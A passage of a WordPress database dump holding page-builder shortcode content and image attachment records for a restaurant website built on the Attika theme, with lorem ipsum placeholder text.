offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_counter type=\"mkdf-zero-counter\" title_tag=\"\" title_font_weight=\"\" digit=\"68\" title=\"Clients\" digit_color=\"#ffffff\" title_color=\"#ffffff\"][vc_empty_space height=\"62px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_counter type=\"mkdf-zero-counter\" title_tag=\"\" title_font_weight=\"\" digit=\"25\" title=\"Restaurant\" digit_color=\"#ffffff\" title_color=\"#ffffff\"][vc_empty_space height=\"62px\"][/vc_column][/vc_row]','Counters','','publish','closed','closed','','counters','','','2018-08-21 13:36:35','2018-08-21 13:36:35','',3039,'http://attika.mikado-themes.com/?page_id=1857',0,'page','',0),(4334,1,'2018-08-14 13:51:00','2018-08-14 13:51:00','','h5-img-2','','inherit','open','closed','','h5-img-2','','','2018-08-14 13:51:00','2018-08-14 13:51:00','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-2.jpg',0,'attachment','image/jpeg',0),(1702,1,'2018-08-20 11:29:15','2018-08-20 11:29:15','','blog-post-img-10','','inherit','open','closed','','blog-post-img-10','','','2018-08-20 11:29:15','2018-08-20 11:29:15','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/blog-post-img-10.jpg',0,'attachment','image/jpeg',0),(1364,1,'2018-08-15 11:17:18','2018-08-15 11:17:18','','h5-bacground-img','','inherit','open','closed','','h5-bacground-img','','','2018-08-15 11:17:18','2018-08-15 11:17:18','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-bacground-img.jpg',0,'attachment','image/jpeg',0),(4324,1,'2018-08-13 11:31:42','2018-08-13 11:31:42','','h6-img-6a','','inherit','open','closed','','h6-img-6a','','','2018-08-13 11:31:42','2018-08-13 11:31:42','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h6-img-6a.jpg',0,'attachment','image/jpeg',0),(4325,1,'2018-08-10 14:01:13','2018-08-10 14:01:13','','h3-img-gallery-3','','inherit','open','closed','','h3-img-gallery-3','','','2018-08-10 14:01:13','2018-08-10 14:01:13','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-img-gallery-3.jpg',0,'attachment','image/jpeg',0),(4326,1,'2018-08-13 08:32:22','2018-08-13 08:32:22','','h7-port-img-3','','inherit','open','closed','','h7-port-img-3','','','2018-08-13 08:32:22','2018-08-13 08:32:22','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-3.jpg',0,'attachment','image/jpeg',0),(1703,1,'2018-08-20 11:29:18','2018-08-20 11:29:18','','blog-post-img-11','','inherit','open','closed','','blog-post-img-11','','','2018-08-20 11:29:18','2018-08-20 11:29:18','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/blog-post-img-11.jpg',0,'attachment','image/jpeg',0),(4327,1,'2018-08-10 14:01:16','2018-08-10 14:01:16','','h3-img-gallery-4','','inherit','open','closed','','h3-img-gallery-4','','','2018-08-10 14:01:16','2018-08-10 14:01:16','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-img-gallery-4.jpg',0,'attachment','image/jpeg',0),(4328,1,'2018-08-14 13:09:04','2018-08-14 13:09:04','','h5-rev-img-2','','inherit','open','closed','','h5-rev-img-2','','','2018-08-14 13:09:04','2018-08-14 13:09:04','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-rev-img-2.jpg',0,'attachment','image/jpeg',0),(1751,1,'2018-08-21 07:24:46','2018-08-21 07:24:46','','h5-bacground-img-1','','inherit','open','closed','','h5-bacground-img-1','','','2018-08-21 07:24:46','2018-08-21 07:24:46','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-bacground-img-1.jpg',0,'attachment','image/jpeg',0),(1948,1,'2018-08-22 09:54:44','2018-08-22 09:54:44','[vc_row row_content_width=\"grid\" row_background_lines=\"none\" css=\".vc_custom_1524046525458{padding-top: 82px !important;}\"][vc_column css=\".vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}\" offset=\"vc_col-lg-4 vc_col-md-4\"][vc_column_text]Aliquam lorem ante, dapibus in, viverra quis, feugiat a, tellus. Phasellus viverra nulla ut metus varius laoreet. Maecenas tempus.[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}\" offset=\"vc_col-lg-4 vc_col-md-4\"][vc_column_text]Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}\" offset=\"vc_col-lg-4 vc_col-md-4\"][vc_column_text]Donec vitae sapien ut libero venenatis faucibus. Nullam quis ante. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo.[/vc_column_text][/vc_column][/vc_row][vc_row row_content_width=\"grid\" row_background_lines=\"none\" css=\".vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}\"][vc_column][vc_text_separator title=\"Separator with Text\" color=\"custom\" accent_color=\"#a1a1a1\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" row_background_lines=\"none\"][vc_column][mkdf_separator border_style=\"dotted\" width=\"100%\" thickness=\"1\"][vc_empty_space height=\"37px\"][mkdf_separator border_style=\"dashed\" width=\"100%\" thickness=\"1\"][vc_empty_space height=\"37px\"][mkdf_separator border_style=\"solid\" width=\"100%\" thickness=\"1px\"][vc_empty_space height=\"38px\"][mkdf_separator border_style=\"solid\" width=\"100%\" thickness=\"2px\"][vc_empty_space height=\"38px\"][mkdf_separator border_style=\"solid\" width=\"100%\" thickness=\"6px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" row_background_lines=\"none\" css=\".vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}\"][vc_column width=\"2/3\" offset=\"vc_col-lg-4 vc_col-md-4\"][vc_column_text]\n<h4>Left align</h4>\n[/vc_column_text][vc_empty_space height=\"14px\"][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing elit nean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis.[/vc_column_text][vc_empty_space height=\"23px\"][mkdf_separator position=\"left\" border_style=\"\" width=\"25%\" thickness=\"2px\" color=\"#a1a1a1\"][vc_empty_space height=\"15px\"][/vc_column][vc_column width=\"2/3\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-2\"][vc_column_text]\n<h4 style=\"text-align: center;\">Centered</h4>\n[/vc_column_text][vc_empty_space height=\"14px\"][vc_column_text]\n<p style=\"text-align: center;\">Cum sociis Theme natoque penatibus et magnis dis. Lorem ipsum dolor sit amet, consectetuer adipiscing elit nean commodo ligula eget dolor. Aenean massa.</p>\n[/vc_column_text][vc_empty_space height=\"23px\"][mkdf_separator border_style=\"\" width=\"25%\" thickness=\"2px\" color=\"#a1a1a1\"][vc_empty_space height=\"15px\"][/vc_column][vc_column width=\"2/3\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-4\"][vc_column_text]\n<h4 style=\"text-align: right;\">Right align</h4>\n[/vc_column_text][vc_empty_space height=\"14px\"][vc_column_text]\n<p style=\"text-align: right;\">Aenean massa. Cum sociis Theme natoque penatibus et magnis dis. Lorem ipsum dolor sit amet, consectetuer adipiscing elit nean commodo ligula eget dolor.</p>\n[/vc_column_text][vc_empty_space height=\"23px\"][mkdf_separator position=\"right\" border_style=\"\" width=\"25%\" thickness=\"2px\" color=\"#a1a1a1\"][vc_empty_space height=\"15px\"][/vc_column][/vc_row]','Separators','','publish','closed','closed','','separators','','','2018-08-22 09:54:44','2018-08-22 09:54:44','',3039,'http://attika.mikado-themes.com/?page_id=1948',0,'page','',0),(1995,1,'2018-08-23 08:18:54','2018-08-23 08:18:54','[vc_row row_content_width=\"grid\" css=\".vc_custom_1535012679341{padding-top: 105px !important;padding-bottom: 90px !important;}\"][vc_column offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][attika_restaurant_menu_list orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"cocktails\"][vc_empty_space height=\"60px\"][/vc_column][vc_column offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"desserts\"][vc_empty_space height=\"60px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535469268578{padding-top: 105px !important;padding-bottom: 90px !important;}\" simple_background_color=\"#111111\"][vc_column offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][attika_restaurant_menu_list skin=\"light\" alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"desserts\"][vc_empty_space height=\"60px\"][/vc_column][vc_column offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][attika_restaurant_menu_list skin=\"light\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"cocktails\"][vc_empty_space height=\"60px\"][/vc_column][/vc_row]','Restaurant Menu','','draft','closed','closed','','restaurant-menu','','','2020-12-05 17:54:31','2020-12-05 16:54:31','',3039,'http://attika.mikado-themes.com/?page_id=1995',0,'page','',0),(4345,1,'2018-08-13 09:55:35','2018-08-13 09:55:35','','h6-img-2a','','inherit','open','closed','','h6-img-2a','','','2018-08-13 09:55:35','2018-08-13 09:55:35','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h6-img-2a.jpg',0,'attachment','image/jpeg',0),(1903,1,'2018-08-22 07:33:45','2018-08-22 07:33:45','','port-single-img-3a','','inherit','open','closed','','port-single-img-3a','','','2018-08-22 07:33:45','2018-08-22 07:33:45','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/port-single-img-3a.jpg',0,'attachment','image/jpeg',0),(1451,1,'2018-08-16 10:32:29','2018-08-16 10:32:29','','h1-blog-post-4','','inherit','open','closed','','h1-blog-post-4','','','2018-08-16 10:32:29','2018-08-16 10:32:29','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-blog-post-4.jpg',0,'attachment','image/jpeg',0),(1633,1,'2018-08-17 14:26:32','2018-08-17 14:26:32','','h3-top-single-img','','inherit','open','closed','','h3-top-single-img','','','2018-08-17 14:26:32','2018-08-17 14:26:32','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-top-single-img.png',0,'attachment','image/png',0),(2019,1,'2018-08-23 09:33:51','2018-08-23 09:33:51','[vc_row row_content_width=\"grid\" css=\".vc_custom_1535019332070{padding-top: 43px !important;padding-bottom: 100px !important;}\"][vc_column][mkdf_video_button video_link=\"https://vimeo.com/183648707\" video_image=\"2020\"][/vc_column][/vc_row]','Video Button','','publish','closed','closed','','video-button','','','2018-08-23 09:33:51','2018-08-23 09:33:51','',3039,'http://attika.mikado-themes.com/?page_id=2019',0,'page','',0),(4346,1,'2018-08-13 09:55:38','2018-08-13 09:55:38','','h6-img-3a','','inherit','open','closed','','h6-img-3a','','','2018-08-13 09:55:38','2018-08-13 09:55:38','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h6-img-3a.jpg',0,'attachment','image/jpeg',0),(2020,1,'2018-08-23 09:33:23','2018-08-23 09:33:23','','h4-img-4','','inherit','open','closed','','h4-img-4','','','2018-08-23 09:33:23','2018-08-23 09:33:23','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-img-4.jpg',0,'attachment','image/jpeg',0),(2349,1,'2018-08-29 08:19:43','2018-08-29 08:19:43','','h7-port-img-6','','inherit','open','closed','','h7-port-img-6-2','','','2018-08-29 08:19:43','2018-08-29 08:19:43','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-6-1.jpg',0,'attachment','image/jpeg',0),(1684,1,'2018-08-20 10:32:38','2018-08-20 10:32:38','\"Everythings Nice\" from YouTube Audio Library by Jingle Punks. Genre: R&amp;B &amp; Soul.','Everythings Nice','','inherit','open','closed','','everythings-nice','','','2018-08-20 10:32:38','2018-08-20 10:32:38','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/b-audio-everytings-nice.mp3',0,'attachment','audio/mpeg',0),(2006,1,'2018-08-23 09:10:51','2018-08-23 09:10:51','','h4-rev-img-3','','inherit','open','closed','','h4-rev-img-3','','','2018-08-23 09:10:51','2018-08-23 09:10:51','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-rev-img-3.png',0,'attachment','image/png',0),(1698,1,'2018-08-20 11:29:02','2018-08-20 11:29:02','','blog-post-img-6','','inherit','open','closed','','blog-post-img-6','','','2018-08-20 11:29:02','2018-08-20 11:29:02','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/blog-post-img-6.jpg',0,'attachment','image/jpeg',0),(2007,1,'2018-08-23 09:10:53','2018-08-23 09:10:53','','h4-rev-img-4','','inherit','open','closed','','h4-rev-img-4','','','2018-08-23 09:10:53','2018-08-23 09:10:53','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-rev-img-4.png',0,'attachment','image/png',0),(2174,1,'2018-08-27 11:04:13','2018-08-27 11:04:13','[vc_row css=\".vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}\" simple_background_color=\"#eaeaea\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner][mkdf_reservation_form open_table_id=\"98\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner][mkdf_reservation_form open_table_id=\"98\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}\" simple_background_color=\"#e6dede\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner][mkdf_reservation_form open_table_skin=\"light\" open_table_id=\"161697\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Reservation Form','','publish','closed','closed','','reservation-form','','','2018-08-27 11:04:13','2018-08-27 11:04:13','',3039,'http://attika.mikado-themes.com/?page_id=2174',0,'page','',0),(4347,1,'2018-08-13 09:55:40','2018-08-13 09:55:40','','h6-img-4a','','inherit','open','closed','','h6-img-4a','','','2018-08-13 09:55:40','2018-08-13 09:55:40','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h6-img-4a.jpg',0,'attachment','image/jpeg',0),(2008,1,'2018-08-23 09:10:55','2018-08-23 09:10:55','','h4-rev-img-5','','inherit','open','closed','','h4-rev-img-5','','','2018-08-23 09:10:55','2018-08-23 09:10:55','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-rev-img-5.png',0,'attachment','image/png',0),(1699,1,'2018-08-20 11:29:07','2018-08-20 11:29:07','','blog-post-img-7','','inherit','open','closed','','blog-post-img-7','','','2018-08-20 11:29:07','2018-08-20 11:29:07','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/blog-post-img-7.jpg',0,'attachment','image/jpeg',0),(2040,1,'2018-08-23 12:30:51','2018-08-23 12:30:51','','h2-logo-center-1png','','inherit','open','closed','','h2-logo-center-1png','','','2018-08-23 12:30:51','2018-08-23 12:30:51','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png',0,'attachment','image/png',0),(2009,1,'2018-08-23 09:10:57','2018-08-23 09:10:57','','h4-rev-img-6','','inherit','open','closed','','h4-rev-img-6','','','2018-08-23 09:10:57','2018-08-23 09:10:57','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-rev-img-6.png',0,'attachment','image/png',0),(2344,1,'2018-08-29 08:21:14','2018-08-29 08:21:14','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus.[/vc_column_text][/vc_column][/vc_row]','Salad','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','salad','','','2018-08-29 08:21:14','2018-08-29 08:21:14','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2344',0,'portfolio-item','',0),(2345,1,'2018-08-29 08:22:05','2018-08-29 08:22:05','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit.[/vc_column_text][/vc_column][/vc_row]','M&K Fruit','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','mk-fruit','','','2018-08-29 08:22:05','2018-08-29 08:22:05','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2345',0,'portfolio-item','',0),(2351,1,'2018-08-29 08:19:50','2018-08-29 08:19:50','','h7-port-img-11','','inherit','open','closed','','h7-port-img-11','','','2018-08-29 08:19:50','2018-08-29 08:19:50','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-11.jpg',0,'attachment','image/jpeg',0),(4329,1,'2018-08-10 14:13:46','2018-08-10 14:13:46','','h3-img-gallery-5','','inherit','open','closed','','h3-img-gallery-5','','','2018-08-10 14:13:46','2018-08-10 14:13:46','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-img-gallery-5.jpg',0,'attachment','image/jpeg',0),(4330,1,'2018-08-13 08:50:09','2018-08-13 08:50:09','','h2-port-img-1a','','inherit','open','closed','','h2-port-img-1a','','','2018-08-13 08:50:09','2018-08-13 08:50:09','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-port-img-1a.jpg',0,'attachment','image/jpeg',0),(4331,1,'2018-08-14 13:50:58','2018-08-14 13:50:58','','h5-img-1','','inherit','open','closed','','h5-img-1','','','2018-08-14 13:50:58','2018-08-14 13:50:58','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-1.jpg',0,'attachment','image/jpeg',0),(4332,1,'2018-08-10 14:13:48','2018-08-10 14:13:48','','h3-img-gallery-6','','inherit','open','closed','','h3-img-gallery-6','','','2018-08-10 14:13:48','2018-08-10 14:13:48','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-img-gallery-6.jpg',0,'attachment','image/jpeg',0),(2387,1,'2018-08-29 11:07:33','2018-08-29 11:07:33','[vc_row content_placement=\"top\" row_content_width=\"grid\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][mkdf_instagram_list number_of_columns=\"three\" space_between_columns=\"normal\" image_size=\"standard_resolution\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"yes\" slider_pagination=\"no\" number_of_photos=\"6\"][/vc_column][/vc_row]','Instagram List','','publish','closed','closed','','instagram-list','','','2018-08-29 11:07:33','2018-08-29 11:07:33','',3039,'http://attika.mikado-themes.com/?page_id=2387',0,'page','',0),(2419,1,'2018-08-29 13:36:47','2018-08-29 13:36:47','','Left Sidebar','','publish','closed','closed','','left-sidebar','','','2018-08-29 13:36:47','2018-08-29 13:36:47','',0,'http://attika.mikado-themes.com/?page_id=2419',0,'page','',0),(2421,1,'2018-08-29 13:37:16','2018-08-29 11:37:16','','No Sidebar','','draft','closed','closed','','no-sidebar','','','2020-12-05 17:52:00','2020-12-05 16:52:00','',0,'http://attika.mikado-themes.com/?page_id=2421',0,'page','',0),(2435,1,'2018-08-29 14:10:40','2018-08-29 14:10:40','[vc_row row_content_width=\"grid\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row]','Portfolio List Trio','','publish','closed','closed','','portfolio-list-trio','','','2018-08-29 14:10:40','2018-08-29 14:10:40','',3061,'http://attika.mikado-themes.com/?page_id=2435',0,'page','',0),(2448,1,'2018-08-29 14:33:34','2018-08-29 14:33:34','[vc_row full_height=\"yes\" content_text_aligment=\"center\" css=\".vc_custom_1535553249523{padding-top: 100px !important;padding-bottom: 100px !important;background-color: #e7dfdf !important;}\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner][mkdf_portfolio_slider enable-center=\"no\" enable-auto-width=\"no\" number_of_columns=\"one\" space_between_items=\"no\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" enable_fullheight=\"no\" portfolio_slider_full_height_decrease=\"no\" item_style=\"gallery-overlay\" title_tag=\"h6\" enable_category=\"no\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" navigation_skin=\"dark\" enable_pagination=\"no\" category=\"cake\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Portfolio Slider Grid','','publish','closed','closed','','portfolio-slider-grid','','','2018-08-29 14:33:34','2018-08-29 14:33:34','',3061,'http://attika.mikado-themes.com/?page_id=2448',0,'page','',0),(2457,1,'2018-08-29 14:44:09','2018-08-29 14:44:09','[vc_row][vc_column][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"four\" space_between_items=\"normal\" number_of_items=\"\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"DESC\" item_style=\"gallery-overlay\" title_tag=\"h5\" enable_category=\"no\" pagination_type=\"load-more\" category=\"new\"][/vc_column][/vc_row]','Gallery List','','publish','closed','closed','','gallery-list','','','2018-08-29 14:44:09','2018-08-29 14:44:09','',3061,'http://attika.mikado-themes.com/?page_id=2457',0,'page','',0),(2472,1,'2018-08-30 08:42:25','2018-08-30 08:42:25','[vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][/vc_column][vc_column width=\"1/3\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1535626950960{margin-top: -60px !important;}\"][vc_row_inner row_content_width=\"grid\" css=\".vc_custom_1535627671543{padding-top: 160px !important;padding-bottom: 120px !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\"][vc_column_inner][vc_column_text css=\".vc_custom_1535632790817{padding-right: 10% !important;padding-left: 10% !important;}\"]\n<p style=\"text-align: center;\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin pharetra facilisis nunc ac lacinia. Nam efficitur leo justo, at rutrum lacus dictum nec. Nullam non rutrum felis. Nam ac massa eget quam condimentum iaculis at in justo.Vivamus gravida scelerisque ipsum eget malesuada. Nullam tristique accumsan velit. Maecenas dui mi, ullamcorper mollis est et.</p>\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner css=\".vc_custom_1535119322528{margin-top: -20px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2135\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Menu Pop Up','','publish','closed','closed','','menu-pop-up','','','2018-08-30 08:42:25','2018-08-30 08:42:25','',3039,'http://attika.mikado-themes.com/?page_id=2472',0,'page','',0),(2477,1,'2018-08-30 09:58:20','2018-08-30 09:58:20','[vc_row row_content_width=\"grid\" content_text_aligment=\"center\"][vc_column width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_team type=\"info-on-image\" team_name_tag=\"\" team_social_icon_pack=\"\" team_name=\"Atticus Finch\" team_position=\"fisherman &amp; owner\" team_image=\"1106\"][vc_empty_space height=\"50px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_team type=\"info-on-image\" team_name_tag=\"\" team_social_icon_pack=\"\" team_name=\"Atticus Finch\" team_position=\"fisherman &amp; owner\" team_image=\"2488\"][vc_empty_space height=\"50px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_team type=\"info-on-image\" team_name_tag=\"\" team_social_icon_pack=\"\" team_name=\"Atticus Finch\" team_position=\"fisherman &amp; owner\" team_image=\"2489\"][vc_empty_space height=\"50px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_team type=\"info-on-image\" team_name_tag=\"\" team_social_icon_pack=\"\" team_name=\"Atticus Finch\" team_position=\"fisherman &amp; owner\" team_image=\"2487\"][vc_empty_space height=\"50px\"][/vc_column][/vc_row]','Team','','publish','closed','closed','','team','','','2018-08-30 09:58:20','2018-08-30 09:58:20','',3039,'http://attika.mikado-themes.com/?page_id=2477',0,'page','',0),(2864,1,'2018-09-14 09:37:47','2018-09-14 09:37:47','','h5-rev-img-2a','','inherit','open','closed','','h5-rev-img-2a','','','2018-09-14 09:37:47','2018-09-14 09:37:47','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/h5-rev-img-2a.jpg',0,'attachment','image/jpeg',0),(2756,1,'2018-09-05 07:52:52','2018-09-05 07:52:52','','landing-vector-img-8','','inherit','open','closed','','landing-vector-img-8','','','2018-09-05 07:52:52','2018-09-05 07:52:52','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-8.png',0,'attachment','image/png',0),(2489,1,'2018-08-30 10:17:21','2018-08-30 10:17:21','','h3-team-member-img-3','','inherit','open','closed','','h3-team-member-img-3','','','2018-08-30 10:17:21','2018-08-30 10:17:21','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-team-member-img-3.jpg',0,'attachment','image/jpeg',0),(2494,1,'2018-08-30 10:35:10','2018-08-30 10:35:10','[vc_row row_content_width=\"grid\" content_text_aligment=\"center\" el_class=\"main-home-second-row\" css=\".vc_custom_1535628318862{padding-bottom: 70px !important;}\"][vc_column][mkdf_reservation_popup open_table_id=\"161697\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" el_class=\"main-home-second-row\" css=\".vc_custom_1535629459423{padding-top: 60px !important;padding-bottom: 110px !important;background-color: #f9f5f0 !important;}\"][vc_column][vc_column_text css=\".vc_custom_1535626873687{padding-right: 10% !important;padding-left: 10% !important;}\"]\n<p style=\"text-align: center;\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin pharetra facilisis nunc ac lacinia. Nam efficitur leo justo, at rutrum lacus dictum nec. Nullam non rutrum felis. Nam ac massa eget quam condimentum iaculis at in justo.Vivamus gravida scelerisque ipsum eget malesuada. Nullam tristique accumsan velit. Maecenas dui mi, ullamcorper mollis est et.</p>\n[/vc_column_text][/vc_column][/vc_row]','Reservation Pop Up','','publish','closed','closed','','reservation-pop-up','','','2018-08-30 10:35:10','2018-08-30 10:35:10','',3039,'http://attika.mikado-themes.com/?page_id=2494',0,'page','',0),(2542,1,'2018-08-30 14:09:36','2018-08-30 14:09:36','[vc_row disable_background_image=\"\" content_text_aligment=\"center\" css=\".vc_custom_1535962435703{padding-top: 80px !important;padding-bottom: 125px !important;}\" simple_background_image=\"2556\" background_image_position=\"top center\"][vc_column][vc_column_text]\n<h5>Inspire everyone’s senses with the exquisite Attika</h5>\n[/vc_column_text][/vc_column][/vc_row][vc_row el_class=\"mkdf-landing-homes-section\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 2% 0 32%\" item_padding_1367_1600=\"0 3% 0 23%\" item_padding_1025_1366=\"0 3% 0 20%\" item_padding_769_1024=\"0 3% 0 20%\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" title_tag=\"\" image=\"2946\" image_size=\"full\" title=\"Main Home\" title_top_margin=\"22\" 